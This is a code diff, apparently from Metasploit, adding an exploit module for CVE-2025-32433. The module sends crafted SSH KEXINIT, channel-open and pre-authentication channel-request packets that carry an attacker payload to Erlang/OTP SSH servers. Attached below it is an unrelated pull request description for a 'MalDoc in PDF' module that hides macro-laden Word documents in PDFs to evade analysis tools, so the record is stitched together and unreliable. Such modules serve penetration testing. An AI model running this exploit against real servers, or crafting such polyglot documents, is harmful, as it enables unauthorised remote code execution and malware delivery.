+          'diffie-hellman-group14-sha256'
+        ]
+      ) +
+      name_list(['rsa-sha2-256', 'rsa-sha2-512']) +
+      name_list(['aes128-ctr']) * 2 +
+      name_list(['hmac-sha1']) * 2 +
+      name_list(['none']) * 2 +
+      name_list([]) * 2 +
+      "\x00" +
+      [0].pack('N')
+  end
+
+  # Formats a list of names into an SSH-compatible string (comma-separated)
+  def name_list(names)
+    string_payload(names.join(','))
+  end
+
+  # Pads a packet to match SSH framing
+  def pad_packet(payload, block_size)
+    min_padding = 4
+
+    payload_length = payload.length
+    padding_len = block_size - ((payload_length + 5) % block_size)
+    padding_len += block_size if padding_len < min_padding
+
+    [(payload_length + 1 + padding_len)].pack('N') +
+      [padding_len].pack('C') +
+      payload +
+      "\x00" * padding_len
+  end
+
+  # Helper to format SSH string (4-byte length + bytes)
+  def string_payload(str)
+    s_bytes = str.encode('utf-8')
+    [s_bytes.length].pack('N') + s_bytes
+  end
+
+  def exploit
+    print_status('Starting exploit for CVE-2025-32433')
+
+    begin
+      ssh_opts = {
+        host: datastore['RHOST'],
+        port: datastore['RPORT'],
+        timeout: 5
+      }
+
+      print_status('Connecting to SSH server...')
+      tcp_socket = Rex::Socket::Tcp.create(
+        'PeerHost' => ssh_opts[:host],
+        'PeerPort' => ssh_opts[:port],
+        'Timeout' => ssh_opts[:timeout]
+      )
+
+      print_status('Sending SSH banner...')
+      tcp_socket.put("SSH-2.0-OpenSSH_8.9\r\n")
+
+      banner = tcp_socket.get_once(1024)
+      if banner
+        print_good("Received banner: #{banner.strip}")
+      else
+        fail_with(Failure::Unknown, 'No banner received')
+      end
+      sleep(0.5)
+
+      print_status('Sending SSH_MSG_KEXINIT...')
+      kex_packet = build_kexinit
+      tcp_socket.put(pad_packet(kex_packet, 8))
+      sleep(0.5)
+
+      print_status('Sending SSH_MSG_CHANNEL_OPEN...')
+      chan_open = build_channel_open(0)
+      tcp_socket.put(pad_packet(chan_open, 8))
+      sleep(0.5)
+
+      print_status('Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...')
+      chan_req = build_channel_request(0, payload.encoded)
+      tcp_socket.put(pad_packet(chan_req, 8))
+
+      begin
+        response = tcp_socket.get_once(1024, 5)
+        if response
+          vprint_status("Received response: #{response.unpack('H*').first}")
+          print_good('Payload sent successfully')
+        else
+          print_status('No response within timeout period (which is expected)')
+        end
+      rescue Rex::TimeoutError
+        print_status('No response within timeout period (which is expected)')
+      end
+      tcp_socket.close
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Failed to connect to the target')
+    rescue Rex::TimeoutError
+      fail_with(Failure::Timeout, 'Connection timed out')
+    rescue StandardError => e
+      fail_with(Failure::Unknown, "Error: #{e.message}")
+    end
+  end
+
+end

--- a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
+++ b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
@@ -194,7 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       fail_with(Failure::Unreachable, 'Failed to connect to the target')
     rescue Rex::TimeoutError
-      fail_with(Failure::Timeout, 'Connection timed out')
+      fail_with(Failure::TimeoutExpired, 'Connection timed out')
     rescue StandardError => e
       fail_with(Failure::Unknown, "Error: #{e.message}")
     end


### PR DESCRIPTION
The technique is called "MalDoc in PDF". This technique hides malicious Word documents in PDF files, which is why malicious code contained in them cannot be detected by many analysis tools.

**The document can be opened in both Microsoft Word and a PDF reader.**

However, for the macro to run, you must open this document in Microsoft Word. The attack does not bypass configured macro locks. The malicious macros are also not executed when the file is opened in PDF readers or similar software.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/fileformat/maldoc_in_pdf_polyglot`
- [ ] `set FILENAME /tmp/macro.htm`
- [ ] `run`

## Options

### FILENAME

The input MHT filename with macro embedded.

### INJECTED_PDF

The input PDF filename to be injected. (optional)

### MESSAGE_PDF

The message to display in the local PDF template (if INJECTED_PDF is NOT used). Default: You must open this document in Microsoft Word

## Results

The document can be opened in both Microsoft Word and a PDF reader.

![image](https://github.com/user-attachments/assets/f3afbf7a-b50a-4876-b586-2ce50caa1241)

A malicious MHT file created can be opened in Microsoft Word even though it has magic numbers and file
structure of PDF.

![image](https://github.com/user-attachments/assets/b4aef43b-c7d8-408a-b441-a57680d384fe)
